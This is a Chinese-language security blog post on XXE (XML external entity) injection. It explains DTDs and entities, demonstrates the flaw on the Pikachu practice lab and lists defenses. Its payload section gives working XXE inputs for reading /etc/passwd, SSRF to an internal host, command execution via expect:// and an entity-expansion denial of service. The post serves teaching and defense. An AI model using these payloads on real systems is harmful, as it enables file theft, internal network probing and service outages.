【漏洞发现】xxe

最新推荐文章于 2024-09-28 22:34:31 发布
最新推荐文章于 2024-09-28 22:34:31 发布
阅读量251 收藏
点赞数
分类专栏: 漏洞发现-xxe 文章标签: 安全 前端 web安全 运维 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46344990/article/details/129912963
版权

一、漏洞描述

XXE漏洞利用的是XML解析器处理XML文件时的一个特性,即可以引用外部实体。攻击者可以在XML文档中定义一个外部实体,并在引用该实体时,在外部实体中注入恶意代码或文件路径等敏感信息。当XML解析器解析文档时,会自动解析外部实体,导致恶意代码或信息被执行或泄露。

二、相关知识

1、xml

可扩展标记语言,类似html,是传输数据并非显示数据,自行定义标签。有格式规范的用户自定义语言,利于数据的存储和传输(类似于JSON)。

2、DTD

1.内部声明DTD:

<!DOCTYPE根元素【元素声明】>

2.引用外部DTD:

<!DOCTYPE根元素【元素声明】>

3.内外部DTD文档结合:

<!DOCTYPE根元素SYSTEM"DTD文件路径"【定义内容】>

4、PCDATA:被解析的字符数据

CDATA:不会被解析器解析

3、实体

内部实体:

字符实体:

参数实体:或者

(%xxx只能在dtd中使用)

XML 外部实体注入成因:XML规范允许外部引用来定义实体,XML解析器将动态提取这些实体的值,XML解析器将提取指定的URL或文件的内容,并将其作为已定义实体的值在响应中返回。

xml外部实体注入的利用:

1,使用file://或php://协议来指定本地文件系统上的资源并使其返回

2,使用http://等协议让服务器通过网络提取资源,泄露敏感信息。

3,执行SSRF类的攻击,通过XML实体注入对内网进行端口,主机等探测

4,通过无期限读取某个文件流,实施拒绝服务攻击

5,利用它们与后端系统上无法通过因特网直接访问的网络服务器进行交互,如尝试连接到25端口的邮件服务器。

4、xxe payload

文件读取:

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><root><name>&xxe;</name></root>

SSRF:

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" >]><foo>&xxe;</foo>

RCE:

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "expect://id" >]><root><name>&xxe;</name></root>

DDoS:

<!DOCTYPE data [<!ELEMENT data (#ANY)><!ENTITY a0 "dos" ><!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;"><!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;">]><data>&a2;</data>

三、漏洞利用

这里使用pikachu简单演示,可见该输入框输入参数后服务器可解析xml

填入语句

<?xml version="1.0" encoding="UTF-8" ?>//声明xml版本以及编码方式
<!DOCTYPE note [//文档定义 定义变量hack的值为hello world
<!ENTITY hack "hello world">
]><name>&hack;</name>//引用变量

若存在xxe则上面xml会被解析,前端呈现hello word

函数:simplexml_load_string()是 PHP 中用于将 XML 字符串解析为 SimpleXMLElement 对象的函数。SimpleXMLElement 是 PHP 中用于处理 XML 数据的内置类,可以方便地访问和操作 XML 数据。

存在xxe,现在就可以利用xxe各种操作了

四、xxe防御

1.禁用外部实体:禁用 XML 解析器中的外部实体功能,从而防止攻击者利用外部实体注入攻击。在 PHP 中,可以使用以下代码禁用外部实体:

libxml_disable_entity_loader(true);

2.输入验证:对输入的 XML 数据进行验证,只允许特定格式和结构的数据。可以使用 XML Schema 或 DTD(文档类型定义)来定义允许的 XML 结构,并在解析 XML 数据时使用验证器来验证数据的结构和内容是否符合定义。

3.过滤危险实体:在解析 XML 数据时,可以对实体进行过滤,只允许特定的实体,或者禁止包含敏感信息的实体,如文件系统路径、网络地址等。可以使用 XML 解析器中的实体解析器来实现过滤。

4.使用安全的 XML 解析器:使用安全的 XML 解析器,如 SimpleXML 或 DOM,这些解析器默认禁用外部实体,并提供了额外的安全防护措施,如禁止解析 XML 注释和处理指令等。

5.使用隔离环境:将解析 XML 数据的应用程序隔离在独立的环境中,限制应用程序的访问权限,从而减少攻击者利用 XXE 攻击获取敏感信息或执行恶意代码的风险。

Edward Hopper
关注
专栏目录
XXE漏洞以及XXE漏洞如何修复
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 2万+
XXE漏洞是什么?XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。这些就称为XXE漏洞。知道XXE漏洞前首先得先了解XML。XXE漏洞如何修复的方案一:使用开发语言提供的禁用外部实体的方法1.PHP开发语言禁用外部实体的方法:libxml_disable_entity_loader(true);XXE漏洞如何修复的方案二:尽量不要让用户直接
33-4 XXE漏洞 - xxe判断
weixin_43263566的博客
04-02 205
【代码】33-4 XXE漏洞 - xxe判断。
WEB漏洞——XXE
qq_63594215的博客
04-12 924
本次文章主要介绍XXE漏洞的原理,利用以及防御的过程,另外还有介绍一点XML的基础知识,详情请见下文。a) xml,eXtensible Markup Language,可扩展标记语言,是一种标记语言,使用简单标记描述数据b) xml是一种非常灵活的语言,没有固定的标签,所有标签都可以自定义c) 通常,xml被用于信息的传递和记录,因此,xml经常被用于充当配置文件如果把HTML和XML进行对比的话,HTML进行对比的话,HTML旨在显示数据信息,而XML旨在用来进行数据的传输和存储。
XXE漏洞笔记
qq_32812063的博客
11-26 658
XXE
XXE-XML实体注入漏洞
2301_80661529的博客
03-07 1371
DTD(document type definition)文档类型定义用于定义XML文档的结构,它作为xml文件的 一部分位于XML声明和文档元素之间,比如下面DTD它就定义了 XML 的根元素必须是message,根元素下面有一些子元素,所以 XML必须像下 面这么写:其中,DTD需要在!DOCTYPE注释中定义根元素,而后在中括号的[]内使用!ELEMENT注 释定义各元素特征。
XXE 漏洞及案例实战
来日可期的博客
09-24 2824
XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
深入理解漏洞XXE 漏洞
weixin_50464560的博客
05-16 1189
介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将注意力集中于外部实体中,而不要
Web漏洞-XXE漏洞(详细)
Ays.Ie的博客
03-11 5643
该篇描述Web漏洞-XXE漏洞(详细)
XXE漏洞
huangyongkang666的博客
03-29 2458
XXE漏洞 1.漏洞简介 ​ XXE 漏洞全称XML External Entity Injection,即 XML 外部实体注入漏洞XXE 漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意 xml文件。 2.XML简介 ​ XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一
Pikachu靶场——XXE 漏洞
来日可期的博客
09-29 3970
XXE(XML External Entity)攻击是一种利用XML解析漏洞的攻击。在这种攻击中,攻击者通过在XML文件中插入恶意实体来触发解析加载恶意代码或文件,从而执行任意代码、读取本地文件等操作。在XXE攻击中,攻击者通常会构造一个包含恶意实体的XML文件,并将其提交到目标服务上进行解析。当服务使用XML解析解析文件时,会读取实体并展开其定义,从而导致恶意代码被执行或文件被泄露。
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE(XML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
105-web漏洞挖掘之XXE漏洞1
08-03
XXE漏洞详解】 XXE,全称为XML External Entity Injection,是XML解析在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行...
探索光耦:隔离电压——光耦保障电路安全与性能的关键
forvevr的博客
09-25 633
在实际应用中,光耦的隔离电压应根据工作环境中的电压等级、电流负载和潜在的电压波动来选择。比如,对于高压电力设备,建议选择隔离电压较高的光耦,以应对突发的电压尖峰或电流浪涌。在现代电子设备和系统中,电气隔离是保障电路稳定运行和安全的重要环节,而光耦(光电耦合)则是实现这种隔离的核心元件之一。具有较高隔离电压的光耦能在这些波动和干扰中,稳定地工作,确保系统运行的连续性和可靠性。光耦通过将不同电位的电路有效隔离,避免了跨电路间的电流回流对低压电路元件的损害,延长了设备的使用寿命。
【蚂蚁HR-注册/登录安全分析报告】
最新发布
09-28 466
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
【车联网安全】车端网络攻击及检测的框架/模型
#7的博客
09-24 1354
本文主要调研了车联网安全的一些攻击及检测的模型/框架,对国家标准进行了调研,并汇总上述调研内容。
个人计算机与网络的安全
nn_84的博客
09-24 284
关于 wifi 大家都知道 wifi 已经使用了 wpa3 非常安全 但很多人不知道 pin 和 wps 这两项有漏洞。种漏洞来控制用户电脑 老实说吧 默认用户仍然是管理员 像windows 是很容易得到最高权限的。关于 病毒 大家都知道中国 美国 俄罗斯 的黑客不断的在对抗 所以这病毒花样百出 所以系统用户。关于 国产的 linux 老实说全是漏洞 默认开启 很多服务 但初始化的设置都有漏洞。我发现很多用户都简单设置了这两项 他们的设置 使他们的网络出现了漏洞
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 446
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 889
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。
weixin_64446270的博客
09-27 1005
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。Spring Security 提供了全面的安全服务,从基本的登录认证到复杂的访问控制,几乎涵盖了所有与安全相关的需求。
XXE漏洞深度解析与实战演练
本文档详细介绍了XXE(XML External Entity)漏洞的概念、危害、检测方法、利用技巧以及修复策略,并提供了多个实际案例进行演示。XXE漏洞主要发生在使用XML解析处理用户输入的场景,攻击者可以通过构造恶意的XML...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Edward Hopper

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值